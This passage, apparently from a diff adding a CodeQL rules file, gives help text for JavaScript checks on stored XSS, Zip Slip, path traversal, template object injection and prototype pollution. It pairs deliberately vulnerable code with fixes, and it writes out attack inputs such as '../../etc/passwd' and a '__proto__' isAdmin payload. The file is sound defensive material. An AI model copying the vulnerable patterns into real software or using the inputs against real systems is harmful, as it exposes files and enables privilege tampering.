'\n res.send(list);\n });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // BAD: `fileName` can contain HTML elements\n list += '
  • ' + fileName + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs'),\n escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // GOOD: escaped `fileName` can not contain HTML elements\n list += '
  • ' + escape(fileName) + '
  • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Using uncontrolled stored values in HTML allows for\n a stored cross-site scripting vulnerability.", + "id" : "js/stored-xss", + "kind" : "path-problem", + "name" : "Stored cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/zipslip", + "name" : "js/zipslip", + "shortDescription" : { + "text" : "Arbitrary file access during archive extraction (\"Zip Slip\")" + }, + "fullDescription" : { + "text" : "Extracting files from a malicious ZIP file, or similar type of archive, without validating that the destination file path is within the destination directory can allow an attacker to unexpectedly gain access to resources." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. 
These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. 
If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // BAD: This could write any file on the filesystem.\n entry.pipe(fs.createWriteStream(fileName));\n });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // GOOD: ensures the path is safe to write to.\n if (fileName.indexOf('..') == -1) {\n entry.pipe(fs.createWriteStream(fileName));\n }\n else {\n console.log('skipping bad path', fileName);\n }\n });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n", + "markdown" : "# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. 
This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // BAD: This could write any file on the filesystem.\n entry.pipe(fs.createWriteStream(fileName));\n });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // GOOD: ensures the path is safe to write to.\n if (fileName.indexOf('..') == -1) {\n entry.pipe(fs.createWriteStream(fileName));\n }\n else {\n console.log('skipping bad path', fileName);\n }\n });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path 
Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022" ], + "description" : "Extracting files from a malicious ZIP file, or similar type of archive, without\n validating that the destination file path is within the destination directory\n can allow an attacker to unexpectedly gain access to resources.", + "id" : "js/zipslip", + "kind" : "path-problem", + "name" : "Arbitrary file access during archive extraction (\"Zip Slip\")", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/path-injection", + "name" : "js/path-injection", + "shortDescription" : { + "text" : "Uncontrolled data used in path expression" + }, + "fullDescription" : { + "text" : "Accessing paths influenced by users can allow an attacker to access unexpected resources." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". 
For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n", + "markdown" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from 
user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. 
This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-023", "external/cwe/cwe-036", "external/cwe/cwe-073", "external/cwe/cwe-099" ], + "description" : "Accessing paths influenced by users can allow an attacker to access\n unexpected resources.", + "id" : "js/path-injection", + "kind" : "path-problem", + "name" : "Uncontrolled data used in path expression", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/template-object-injection", + "name" : "js/template-object-injection", + "shortDescription" : { + "text" : "Template Object Injection" + }, + "fullDescription" : { + "text" : "Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', {\n name: profile.name,\n location: profile.location\n });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", + "markdown" : "# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an 
attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', {\n name: profile.name,\n location: profile.location\n });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-073", "external/cwe/cwe-094" ], + "description" : "Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution.", + "id" : "js/template-object-injection", + "kind" : "path-problem", + "name" : "Template Object Injection", 
+ "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.3" + } + }, { + "id" : "js/prototype-polluting-assignment", + "name" : "js/prototype-polluting-assignment", + "shortDescription" : { + "text" : "Prototype-polluting assignment" + }, + "fullDescription" : { + "text" : "Modifying an object obtained via a user-controlled property name may lead to accidental mutation of the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). 
In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos.get(id);\n if (!items) {\n items = new Map();\n req.sessions.todos.set(id, items);\n }\n items.set(req.query.name, req.query.text);\n res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n res.end(403);\n return;\n }\n let items = req.session.todos[id];\n if 
(!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", + "markdown" : "# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). 
In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos.get(id);\n if (!items) {\n items = new Map();\n req.sessions.todos.set(id, items);\n }\n items.set(req.query.name, req.query.text);\n res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n res.end(403);\n return;\n }\n let items = req.session.todos[id];\n if 
(!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], + "description" : "Modifying an object obtained via a user-controlled property name may\n lead to accidental mutation of the built-in Object prototype,\n and possibly escalate to remote code execution or cross-site scripting.", + "id" : "js/prototype-polluting-assignment", + "kind" : "path-problem", + "name" : "Prototype-polluting assignment", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/prototype-pollution-utility", + "name" : "js/prototype-pollution-utility", + "shortDescription" : { + "text" : "Prototype-polluting function" + }, + "fullDescription" : { + "text" : "Functions recursively assigning properties on objects may be the cause of accidental modification of a built-in prototype object." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. 
Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (key === \"__proto__\" || key === \"constructor\") continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: 
[CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", + "markdown" : "# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. 
Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n for (let key in src) {\n if (!src.hasOwnProperty(key)) continue;\n if (key === \"__proto__\" || key === \"constructor\") continue;\n if (isObject(dst[key])) {\n merge(dst[key], src[key]);\n } else {\n dst[key] = src[key];\n }\n }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: 
[CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], + "description" : "Functions recursively assigning properties on objects may be\n the cause of accidental modification of a built-in prototype object.", + "id" : "js/prototype-pollution-utility", + "kind" : "path-problem", + "name" : "Prototype-polluting function", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/prototype-pollution", + "name" : "js/prototype-pollution", + "shortDescription" : { + "text" : "Prototype-polluting merge call" + }, + "fullDescription" : { + "text" : "Recursively merging a user-controlled object into another object can allow an attacker to modify the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any 